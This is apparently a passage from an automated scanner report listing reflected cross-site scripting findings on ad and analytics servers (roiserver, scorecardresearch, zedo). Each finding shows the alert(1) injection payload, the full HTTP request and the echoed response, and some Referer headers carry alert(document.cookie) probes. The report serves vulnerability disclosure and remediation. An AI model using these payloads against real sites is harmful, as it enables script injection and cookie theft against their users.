Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:36 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250842ab';alert(1)//40a370322b1" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.3. http://ads.roiserver.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a473c"%3balert(1)//5cda4ab509d was submitted in the pid parameter. This input was echoed as a473c";alert(1)//5cda4ab509d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311a473c"%3balert(1)//5cda4ab509d&w=300&h=250 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:28 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311a473c";alert(1)//5cda4ab509d&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.4. http://ads.roiserver.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b68a5'%3balert(1)//ef73ca3b12e was submitted in the w parameter. This input was echoed as b68a5';alert(1)//ef73ca3b12e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311&w=300b68a5'%3balert(1)//ef73ca3b12e&h=250 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:32 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300b68a5';alert(1)//ef73ca3b12e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.5. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 56c1b<script>alert(1)</script>1d321066f7f was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=256c1b<script>alert(1)</script>1d321066f7f&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:23 GMT
Date: Wed, 19 Jan 2011 17:59:23 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"256c1b<script>alert(1)</script>1d321066f7f", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.6. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 33c9b<script>alert(1)</script>7d5427cace2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=33c9b<script>alert(1)</script>7d5427cace2&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:36 GMT
Date: Wed, 19 Jan 2011 17:59:36 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"33c9b<script>alert(1)</script>7d5427cace2", c16:"", r:""});

4.7. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 90558<script>alert(1)</script>0af258cd0b5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=603578690558<script>alert(1)</script>0af258cd0b5&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:24 GMT
Date: Wed, 19 Jan 2011 17:59:24 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"603578690558<script>alert(1)</script>0af258cd0b5", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.8. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 26bb2<script>alert(1)</script>dadffb12f82 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=603578626bb2<script>alert(1)</script>dadffb12f82&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:26 GMT
Date: Wed, 19 Jan 2011 17:59:26 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"603578626bb2<script>alert(1)</script>dadffb12f82", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.9. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f09c8<script>alert(1)</script>b3efd23cef2 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=f09c8<script>alert(1)</script>b3efd23cef2&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:29 GMT
Date: Wed, 19 Jan 2011 17:59:29 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"6035786", c3:"6035786", c4:"f09c8<script>alert(1)</script>b3efd23cef2", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.10. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 77439<script>alert(1)</script>58583c10800 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=77439<script>alert(1)</script>58583c10800&c6=&c15=&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:32 GMT
Date: Wed, 19 Jan 2011 17:59:32 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"77439<script>alert(1)</script>58583c10800", c6:"", c10:"", c15:"", c16:"", r:""});

4.11. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 147af<script>alert(1)</script>202194faed4 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=147af<script>alert(1)</script>202194faed4&c15=&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:34 GMT
Date: Wed, 19 Jan 2011 17:59:34 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"147af<script>alert(1)</script>202194faed4", c10:"", c15:"", c16:"", r:""});

4.12. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daf00'%3balert(1)//9a4146cf137 was submitted in the $ parameter. This input was echoed as daf00';alert(1)//9a4146cf137 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=daf00'%3balert(1)//9a4146cf137&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:daf00';alert(1)//9a4146cf137;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=524
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:02 GMT
Connection: close
Content-Length: 1990

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',daf00';alert(1)//9a4146cf137';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,daf00';alert(1)//9a4146cf137;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.13. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e01e"%3balert(1)//82425b7431e was submitted in the $ parameter. This input was echoed as 1e01e";alert(1)//82425b7431e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=1e01e"%3balert(1)//82425b7431e&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:1e01e";alert(1)//82425b7431e;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=524
Expires: Wed, 19 Jan 2011 18:09:46 GMT
Date: Wed, 19 Jan 2011 18:01:02 GMT
Connection: close
Content-Length: 1990

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',1e01e";alert(1)//82425b7431e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,1e01e";alert(1)//82425b7431e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                           var zzStr = "s=1
...[SNIP]...

4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19b1'-alert(1)-'4b1450f596b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?a19b1'-alert(1)-'4b1450f596b=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0daa-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=253
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:46 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=a19b1'-alert(1)-'4b1450f596b=1;';

